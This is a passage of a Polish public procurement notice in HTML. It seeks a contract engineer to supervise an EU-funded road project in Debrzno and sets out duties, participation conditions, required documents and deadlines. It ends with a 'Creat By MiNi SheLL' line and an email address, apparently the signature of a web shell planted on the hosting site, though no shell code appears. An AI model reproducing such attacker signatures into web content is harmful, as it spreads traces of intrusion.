e)sprawozdanie ostateczne - sporządzi i przekaże Zamawiającemu w terminie 10 dni po zakończeniu okresu rękojmi. Sprawozdanie winno zawierać podsumowanie wszystkich działań podejmowanych w czasie realizacji inwestycji, informacje z przebiegu realizacji inwestycji oraz informację o sporządzonych raportach w trakcie realizacji projektu współfinansowanego ze środków unijnych w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2007-2013; Przyjęte przez Zamawiającego sprawozdanie ostateczne będzie stanowiło podstawę zwolnienia zabezpieczenia roszczeń z tytułu rękojmi dla Wykonawcy robót i dla Inżyniera Kontraktu.
f) Po zakończeniu każdego miesiąca  kalendarzowego Inżynier Kontraktu opracuje miesięczny raport z wykonanych przez siebie zadań i przedłoży Zamawiającemu w terminie do 5 dnia roboczego miesiąca następującego po okresie rozliczeniowym. Zamawiający w ciągu 5 dni roboczych ma obowiązek zatwierdzenia raportu. Zatwierdzony Raport jest podstawą wystawienia faktury przez Zarządzającego projektem za wykonaną usługę. 
 Pomimo tak szerokiego zakresu uprawnień i obowiązków Inżynier Kontraktu nie będzie miał prawa do:
a)wprowadzania jakichkolwiek poprawek do podpisanego kontraktu,
b)zwolnienia Wykonawcy Kontraktu Na Roboty z jakichkolwiek jego zobowiązań lub odpowiedzialności zawartych w podpisanym kontrakcie,
c)zgody na ograniczenie zakresu robót lub przekazanie robót Wykonawcy Kontraktu na roboty innemu niż ten, który został wykazany w podpisanym kontrakcie.
9   Wymagania dodatkowe - Wykonawca musi przedstawić w ofercie Program Zapewnienia Jakości usług Inżyniera Kontraktu, szczegółowo opisujący sposób zapewnienia jakości usług, obejmujący m.in.:
1)organizację i sposób wykonywania funkcji Inżyniera Kontraktu;
2)metody i sposób monitoringu Kontraktu;
3)sposób sporządzania i przechowywania dokumentacji budowy;
4)metody rozwiązywania problemów i sporów powstałych w trakcie realizacji robót;
5)sposób odbioru robót;
6)tryb składania oraz treść sprawozdań z przebiegu i realizacji prac;
7)system zapewnienia jakości prowadzonych usług konsultingowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości  7.000,00 zł (słownie: siedem tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca przedstawi oświadczenie na podstawie art. 22 ust. 1 ustawy Prawo Zamówień Publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże , że w okresie ostatnich 3 lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie wykonał co najmniej dwie główne usługi odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia tj. pełnienie funkcji Inżyniera kontraktu, Menadżera projektu, Inwestora zastępczego lub Nadzoru inwestorskiego nad inwestycją budowlaną w tym minimum jedną o wartości nie mniejszej niż 10.000.000,00 zł. brutto, co winien potwierdzić dowodami , czy zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca przedstawi oświadczenie na podstawie art. 22 ust. 1 ustawy Prawo Zamówień Publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	w zakresie dysponowania niezbędnymi osobami warunek zostanie uznany za spełniony jeżeli wykonawca wykaże, iż dysponuje kadrą techniczną posiadającą kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia tj.:
            - osobą do pełnienia funkcji Inżyniera Kontraktu - osoba ta musi posiadać odpowiednią
              wiedzę i doświadczenie zdobyte poprzez zarządzanie w charakterze Inżyniera 
              Kontraktu (Menedżera Projektu), minimum 1 zakończonego kontraktu na roboty
              budowlane o wartości nie mniejszej 10 000 000 zł brutto,
            - osobą do pełnienia specjalisty w zakresie rozliczeń finansowych - osoba ta musi 
              posiadać odpowiednia wiedzę i doświadczenie zdobyte poprzez rozliczanie finansowe, 
              minimum 1 zakończonego kontraktu na roboty budowlane o wartości nie mniejszej niż
              10 000 000 zł brutto,
            - osobą do pełnienia funkcji specjalisty ds. zamówień publicznych osoba ta musi posiadać
              odpowiednia wiedzę i doświadczenie w przygotowaniu i przeprowadzeniu postępowania
              o udzielenie zamówienia publicznego przy realizacji minimum jednego kontraktu na roboty
              budowlane zawartego w trybie ustawy Prawo Zamówień Publicznych.,
           - osobą uprawnioną w specjalności drogowej (Inżynier Rezydent) - osoba ta musi posiadać
             odpowiednią wiedzę i doświadczenie zdobyte poprzez udział w realizacji, minimum 1 
             zakończonego kontraktu na roboty budowlane o wartości nie mniejszej niż 10 000 000 zł 
             brutto,
          -  osobą do pełnienia funkcji Inspektora Nadzoru Inwestorskiego w branży drogowej bez 
             ograniczeń - osoba ta musi posiadać odpowiednią wiedzę i doświadczenie zdobyte 
             poprzez udział w realizacji, minimum 1 zakończonego kontraktu na roboty budowlane
             o wartości nie mniejszej niż 10 000 000 zł brutto,
         -  osobą do pełnienia funkcji Inspektora Nadzoru Inwestorskiego w branży instalacyjnej 
            w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych 
            i  kanalizacyjnych bez ograniczeń - osoba ta musi posiadać odpowiednia wiedzę                              
i  doświadczenie zdobyte poprzez udział w realizacji 1 zakończonego kontraktu na roboty
            budowlane o wartości nie mniejszej niż 3 000 000 zł brutto,
       -    osobą do pełnienia funkcji Inspektora Nadzoru Inwestorskiego w branży elektrycznej bez 
            ograniczeń - osoba ta musi posiadać odpowiednią wiedzę i doświadczenie zdobyte 
            poprzez udział w realizacji 1 zakończonego kontraktu na roboty budowlane o wartości nie
            mniejszej niż 1 000 000 zł brutto,
        -   osobą do pełnienia funkcji Inspektora Nadzoru Inwestorskiego w branży konstrukcyjno-
            budowlanej - osoba ta musi posiadać odpowiednia wiedzę i doświadczenie zdobyte 
            poprzez udział w realizacji 1 zakończonego kontraktu na roboty budowlane o wartości nie 
            mniejszej niż 1 000 000 zł brutto,
       -   osobą do pełnienia funkcji Inspektora Nadzoru Inwestorskiego w branży teletechnicznej - 
            osoba ta musi posiadać odpowiednią wiedzę i doświadczenie zdobyte poprzez udział 
            w realizacji 1 zakończonego kontraktu na roboty budowlane o wartości nie mniejszej niż 
            1 000 000 zł brutto,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże , iż posiada własne środki finansowe lub zdolność kredytową zapewniającą realizację zamówienia w wysokości minimum 250.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na ofertę składają sie następujace dokumenty i załączniki :1)	formularz ofertowy - wypełniony i podpisany przez wykonawcę - załącznik nr 1;
2)	pełnomocnictwo do reprezentowania wykonawcy w niniejszym postępowaniu oraz do podpisania umowy (o ile nie wynika to z dokumentów rejestracyjnych). Pełnomocnictwo osób podpisujących ofertę do reprezentowania Wykonawcy, zaciągania w jego imieniu zobowiązań finansowych w wysokości odpowiadającej cenie oferty oraz podpisania oferty musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli pełnomocnictwo takie nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy (odpisu z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej), to do oferty należy dołączyć oryginał lub poświadczoną za zgodność z oryginałem przez notariusza, kopię pełnomocnictwa wystawionego na reprezentanta Wykonawcy przez osoby do tego upełnomocnione;
3)	oświadczenie, że wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych - załącznik nr 4;
4)	parafowany wzór umowy - załącznik nr 6;
5)	zakres zamówienia powierzony podwykonawcom - załącznik nr 7;
6)	zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy na okres korzystania z nich przy wykonywaniu zamówienia - załącznik nr 9 (jeżeli dotyczy);
7)	Program Zapewnienia Jakości usług Inżyniera Kontraktu - zgodnie z wytycznymi rozdziału III ust. 9 SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy:
1)	zmiana wysokości wynagrodzenia określonego w § 5 ust. 1 umowy w przypadku ustawowej zmiany wysokości stawki podatku od towarów i usług (VAT) - w zakresie zmiany tej stawki;
2)	zmiana przedstawicieli stron - inspektorów nadzoru - w przypadku niemożności pełnienia przez nich powierzonych funkcji (np. zdarzenia losowe, zmiana pracy, rezygnacja).
3)	wszelkie zmiany niniejszej umowy wymagają zgody obu stron wyrażonej w formie pisemnego aneksu do umowy pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.debrzno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Debrzie, ul. Traugutta 2, 77-310 Debrzno, pokój nr 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2013 godzina 10:00, miejsce: Urząd Miasta i Gminy w Debrzie, ul. Traugutta 2, 77-310 Debrzno, pokój nr 1 ( sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zadanie jest finansowane w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 
           2007 - 2013, Oś Priorytetowa 4, Działanie 4.1 Rozwój regionalnej infrastruktury drogowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com